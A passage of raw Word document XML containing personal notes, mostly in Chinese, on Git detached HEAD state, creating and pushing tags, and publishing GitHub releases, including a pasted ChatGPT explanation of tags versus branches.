      </w:r>
    </w:p>
    <w:p w14:paraId="6ADE83C3" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:t>This will move HEAD back to the branch, effectively ending the detached HEAD state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7571B67D" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2672D3EB" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:t>A detached HEAD state is a situation where you're not working on the tip of a branch but on a specific commit. It's useful for certain types of operations but requires careful management of changes, as they aren't automatically saved in a branch unless you explicitly create one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51319806" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C"/>
    <w:p w14:paraId="05ABA513" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04AB88C5" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05055F96" w14:textId="1AF3646C" w:rsidR="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4836DDB9" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9"/>
    <w:p w14:paraId="3825D657" w14:textId="426A749F" w:rsidR="001E7F2C" w:rsidRDefault="007229B3" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，比如你打了个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上去，不会有新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的存在的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7843D718" w14:textId="77777777" w:rsidR="001E7F2C" w:rsidRDefault="001E7F2C" w:rsidP="002E65F9"/>
    <w:p w14:paraId="50C45E6B" w14:textId="0A98C34D" w:rsidR="006850DE" w:rsidRDefault="006850DE" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git tag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只能自己</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令打，没法在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上进行处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20546F05" w14:textId="77777777" w:rsidR="006850DE" w:rsidRPr="006850DE" w:rsidRDefault="006850DE" w:rsidP="006850DE">
      <w:r w:rsidRPr="006850DE">
        <w:t>git tag 2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6233DE7E" w14:textId="77777777" w:rsidR="006850DE" w:rsidRPr="006850DE" w:rsidRDefault="006850DE" w:rsidP="006850DE">
      <w:r w:rsidRPr="006850DE">
        <w:t>git tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEB7324" w14:textId="77777777" w:rsidR="006850DE" w:rsidRPr="006850DE" w:rsidRDefault="006850DE" w:rsidP="006850DE">
      <w:r w:rsidRPr="006850DE">
        <w:t>&gt;&gt;&gt; 2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4760B646" w14:textId="4FAF9B55" w:rsidR="006850DE" w:rsidRDefault="006850DE" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以上仅仅是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>local tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，推</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上去需要执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AEA50A" w14:textId="4195AB3E" w:rsidR="006850DE" w:rsidRDefault="006850DE" w:rsidP="002E65F9">
      <w:r w:rsidRPr="006850DE">
        <w:t>git push origin --tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51371D84" w14:textId="53B9DC62" w:rsidR="006850DE" w:rsidRPr="006850DE" w:rsidRDefault="006850DE" w:rsidP="006850DE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者某个单一的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">tag       </w:t>
      </w:r>
      <w:r w:rsidRPr="006850DE">
        <w:t>git push origin &lt;tag&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087FB52" w14:textId="7F39EA75" w:rsidR="006850DE" w:rsidRDefault="00FA7016" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BE490FF" wp14:editId="638C84E6">
            <wp:extent cx="5274310" cy="3098165"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12577475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47534" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3098165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="388D971F" w14:textId="296D5C51" w:rsidR="006850DE" w:rsidRDefault="00FA7016" w:rsidP="00FA7016">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B1283F" w14:textId="775DA3A1" w:rsidR="006850DE" w:rsidRDefault="006850DE" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，可以发布</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tarballs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>source code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者二进制文件（这些功能是</w:t>
      </w:r>
      <w:r w:rsidRPr="006850DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:r w:rsidRPr="006850DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>特有功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006850DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>而非</w:t>
      </w:r>
      <w:r w:rsidRPr="006850DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r w:rsidRPr="006850DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>自身能支持的功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6953B6CE" w14:textId="77777777" w:rsidR="006850DE" w:rsidRDefault="006850DE" w:rsidP="002E65F9"/>
    <w:p w14:paraId="0280E6CD" w14:textId="479EADE8" w:rsidR="006850DE" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如，如果没有选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你发布不成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如图我暂时保存为草稿，再选择个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行发布。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F1C3C6" w14:textId="472076B4" w:rsidR="00F34C1B" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击“</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1F58A"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>🖊</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”那个进行编辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D59A31" w14:textId="0AD2A047" w:rsidR="006850DE" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D5B7F83" wp14:editId="73A53908">
            <wp:extent cx="5274310" cy="2931160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="237644497"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44497" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2931160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEFD0CE" w14:textId="77777777" w:rsidR="00F34C1B" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9"/>
    <w:p w14:paraId="40CEA211" w14:textId="4AD9E688" w:rsidR="00F34C1B" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="246DC294" wp14:editId="30F8AA98">
            <wp:extent cx="5274310" cy="2952115"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1878213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13628" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2952115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E2F3AA" w14:textId="77777777" w:rsidR="00F34C1B" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9"/>
    <w:p w14:paraId="759688B4" w14:textId="77777777" w:rsidR="00F34C1B" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9"/>
    <w:p w14:paraId="545A7FFF" w14:textId="48B2B15F" w:rsidR="00F34C1B" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发布</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后，如下，可以看到这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的源代码，默认会以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tar.gz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的形式放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，另外我们手动一个一个传的文件也在其中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDD53B5" w14:textId="0D57CFB6" w:rsidR="00F34C1B" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CC82998" wp14:editId="6BCF7DB3">
            <wp:extent cx="5274310" cy="3162935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="675967113"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67113" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮件&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3162935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17034E90" w14:textId="77777777" w:rsidR="00F34C1B" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9"/>
    <w:p w14:paraId="449B9A6C" w14:textId="77777777" w:rsidR="00F34C1B" w:rsidRDefault="00F34C1B" w:rsidP="002E65F9"/>
    <w:p w14:paraId="5D6E1D91" w14:textId="74E9B397" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>git tag means a branch or a commit</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>、</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64712B99" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ChatGPT said:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A28A4F" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA0F0F5" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:r w:rsidRPr="002E65F9">
        <w:t xml:space="preserve">In Git, a </w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tag</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t xml:space="preserve"> is a reference that points to a specific commit. Tags are often used to mark specific points in the commit history that are important, such as releases (e.g., v1.0, v2.0). Tags are not the same as branches, although they share some similarities in how they reference commits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B48D54D" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Differences Between Tags and Branches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542BACD5" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tags Point to Commits</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A925A9F" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t>A tag is essentially a pointer to a specific commit. Once created, a tag does not change, making it a fixed reference point in your repository's history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB472C" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t>Example: If you tag a commit with v1.0, that tag will always point to the same commit, even as you continue to make new commits in your repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D652C8" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Branches Are Moving Pointers</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D32766F" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t>A branch is a pointer to a series of commits, and it moves forward with each new commit. The branch name (e.g., main, develop) always points to the latest commit in that branch's history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F64783" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:t>As you make new commits, the branch pointer is updated to point to the new commit, making it a dynamic reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A220F22" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Types of Tags</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AB5B14" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lightweight Tag</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>: A simple pointer to a commit, similar to a branch but not moving forward. It’s just a name assigned to a commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D1CBEE" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Annotated Tag</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>: This type of tag is stored as a full object in the Git database, containing metadata such as the tagger's name, email, date, and a tagging message. Annotated tags are typically used for release points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5289561B" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Usage of Tags</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B93255" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Release Management</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>: Tags are commonly used to mark specific releases of software, making it easy to reference those points later (e.g., v1.0, v2.0-rc1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCCFA1" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checkpointing</w:t>
      </w:r>
      <w:r w:rsidRPr="002E65F9">
        <w:t>: You can use tags to mark specific important commits, such as the point where a feature was completed or a significant bug was fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C462AEE" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E65F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE9C554" w14:textId="77777777" w:rsidR="002E65F9" w:rsidRPr="002E65F9" w:rsidRDefault="002E65F9" w:rsidP="002E65F9">
      <w:pPr>
